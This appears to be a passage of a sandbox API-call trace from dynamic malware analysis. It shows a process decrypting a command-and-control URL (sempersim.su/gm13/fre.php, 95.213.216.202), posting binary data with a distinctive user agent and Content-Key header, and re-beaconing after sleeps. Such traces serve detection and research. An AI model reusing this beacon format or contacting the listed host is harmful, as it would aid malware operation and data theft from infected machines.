[0182.377] GetProcessHeap () returned 0x620000 [0182.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0182.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.378] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0182.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.379] CryptDestroyKey (hKey=0x62d710) returned 1 [0182.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.380] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0182.380] GetProcessHeap () returned 0x620000 [0182.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0182.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0182.380] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0182.381] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0182.382] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0182.383] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.383] GetProcessHeap () returned 0x620000 [0182.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0182.383] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.383] GetProcessHeap () returned 0x620000 [0182.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0182.384] GetProcessHeap () returned 0x620000 [0182.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0182.384] GetProcessHeap () returned 0x620000 [0182.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0182.385] GetProcessHeap () returned 0x620000 [0182.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6434d0 [0182.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.388] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.405] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0182.411] GetProcessHeap () returned 0x620000 [0182.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0182.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.412] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0182.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.413] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.414] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.414] GetProcessHeap () returned 0x620000 [0182.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0182.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.416] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6434d0, pdwDataLen=0x19fcfc | out: pbData=0x6434d0, pdwDataLen=0x19fcfc) returned 1 [0182.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.417] CryptDestroyKey (hKey=0x62d710) returned 1 [0182.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0182.417] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0182.417] GetProcessHeap () returned 0x620000 [0182.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646548 [0182.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0182.421] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0182.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0182.422] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0182.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0182.424] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0182.424] GetProcessHeap () returned 0x620000 [0182.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0182.424] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644ce8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0182.426] GetProcessHeap () returned 0x620000 [0182.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0182.426] socket (af=2, type=1, protocol=6) returned 0x33c [0182.426] connect (s=0x33c, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0182.477] FreeAddrInfoW (pAddrInfo=0x644ce8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0182.478] GetProcessHeap () returned 0x620000 [0182.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0182.478] GetProcessHeap () returned 0x620000 [0182.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0182.478] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0182.480] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0182.480] GetProcessHeap () returned 0x620000 [0182.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0182.480] GetProcessHeap () returned 0x620000 [0182.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0182.480] GetProcessHeap () returned 0x620000 [0182.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643050 [0182.480] GetProcessHeap () returned 0x620000 [0182.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0182.481] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0182.482] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0182.482] GetProcessHeap () returned 0x620000 [0182.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0182.482] GetProcessHeap () returned 0x620000 [0182.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0182.483] send (s=0x33c, buf=0x63a880*, len=237, flags=0) returned 237 [0182.484] send (s=0x33c, buf=0x6421e0*, len=159, flags=0) returned 159 [0182.484] GetProcessHeap () returned 0x620000 [0182.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0182.484] recv (in: s=0x33c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0184.194] GetProcessHeap () returned 0x620000 [0184.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0184.195] GetProcessHeap () returned 0x620000 [0184.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0184.195] GetProcessHeap () returned 0x620000 [0184.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0184.196] GetProcessHeap () returned 0x620000 [0184.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0184.196] closesocket (s=0x33c) returned 0 [0184.197] GetProcessHeap () returned 0x620000 [0184.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0184.197] GetProcessHeap () returned 0x620000 [0184.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646548 | out: hHeap=0x620000) returned 1 [0184.197] GetProcessHeap () returned 0x620000 [0184.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0184.198] GetProcessHeap () returned 0x620000 [0184.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0184.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1068) returned 0x33c [0184.200] Sleep (dwMilliseconds=0xea60) [0184.224] GetProcessHeap () returned 0x620000 [0184.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0184.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.226] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.236] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0184.242] GetProcessHeap () returned 0x620000 [0184.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0184.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.243] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d210) returned 1 [0184.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.244] CryptSetKeyParam (hKey=0x62d210, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.247] CryptSetKeyParam (hKey=0x62d210, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.247] GetProcessHeap () returned 0x620000 [0184.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0184.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.248] CryptDecrypt (in: hKey=0x62d210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0184.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.249] CryptDestroyKey (hKey=0x62d210) returned 1 [0184.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.250] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0184.250] GetProcessHeap () returned 0x620000 [0184.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646998 [0184.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0184.251] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0184.251] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0184.252] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0184.253] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.253] GetProcessHeap () returned 0x620000 [0184.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0184.253] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.253] GetProcessHeap () returned 0x620000 [0184.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0184.253] GetProcessHeap () returned 0x620000 [0184.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646998 | out: hHeap=0x620000) returned 1 [0184.254] GetProcessHeap () returned 0x620000 [0184.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0184.254] GetProcessHeap () returned 0x620000 [0184.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e58 [0184.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0184.267] GetProcessHeap () returned 0x620000 [0184.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0184.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.268] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0184.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.268] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.269] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.269] GetProcessHeap () returned 0x620000 [0184.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0184.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.270] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e58, pdwDataLen=0x19fcfc | out: pbData=0x642e58, pdwDataLen=0x19fcfc) returned 1 [0184.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.271] CryptDestroyKey (hKey=0x62d710) returned 1 [0184.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0184.272] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0184.272] GetProcessHeap () returned 0x620000 [0184.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646770 [0184.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0184.273] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0184.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0184.274] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0184.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0184.275] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0184.275] GetProcessHeap () returned 0x620000 [0184.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0184.275] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644ce8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0184.277] GetProcessHeap () returned 0x620000 [0184.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b580 [0184.279] socket (af=2, type=1, protocol=6) returned 0x340 [0184.279] connect (s=0x340, name=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0184.332] FreeAddrInfoW (pAddrInfo=0x644ce8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0184.332] GetProcessHeap () returned 0x620000 [0184.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0184.332] GetProcessHeap () returned 0x620000 [0184.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0184.333] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0184.334] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0184.334] GetProcessHeap () returned 0x620000 [0184.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0184.334] GetProcessHeap () returned 0x620000 [0184.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0184.334] GetProcessHeap () returned 0x620000 [0184.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0184.334] GetProcessHeap () returned 0x620000 [0184.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0184.335] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0184.336] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0184.336] GetProcessHeap () returned 0x620000 [0184.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0184.336] GetProcessHeap () returned 0x620000 [0184.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0184.337] send (s=0x340, buf=0x63a880*, len=237, flags=0) returned 237 [0184.339] send (s=0x340, buf=0x6421e0*, len=159, flags=0) returned 159 [0184.339] GetProcessHeap () returned 0x620000 [0184.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0184.339] recv (in: s=0x340, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0186.044] GetProcessHeap () returned 0x620000 [0186.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0186.045] GetProcessHeap () returned 0x620000 [0186.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0186.045] GetProcessHeap () returned 0x620000 [0186.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0186.045] GetProcessHeap () returned 0x620000 [0186.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0186.045] closesocket (s=0x340) returned 0 [0186.046] GetProcessHeap () returned 0x620000 [0186.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b580 | out: hHeap=0x620000) returned 1 [0186.046] GetProcessHeap () returned 0x620000 [0186.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646770 | out: hHeap=0x620000) returned 1 [0186.046] GetProcessHeap () returned 0x620000 [0186.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0186.047] GetProcessHeap () returned 0x620000 [0186.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0186.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb68) returned 0x340 [0186.049] Sleep (dwMilliseconds=0xea60) [0186.057] GetProcessHeap () returned 0x620000 [0186.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0186.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.059] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.066] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0186.076] GetProcessHeap () returned 0x620000 [0186.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0186.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.077] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0186.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.078] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.079] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.079] GetProcessHeap () returned 0x620000 [0186.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0186.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.081] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0186.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.082] CryptDestroyKey (hKey=0x62d710) returned 1 [0186.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.083] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0186.083] GetProcessHeap () returned 0x620000 [0186.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0186.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0186.084] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0186.085] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0186.086] StrStrA 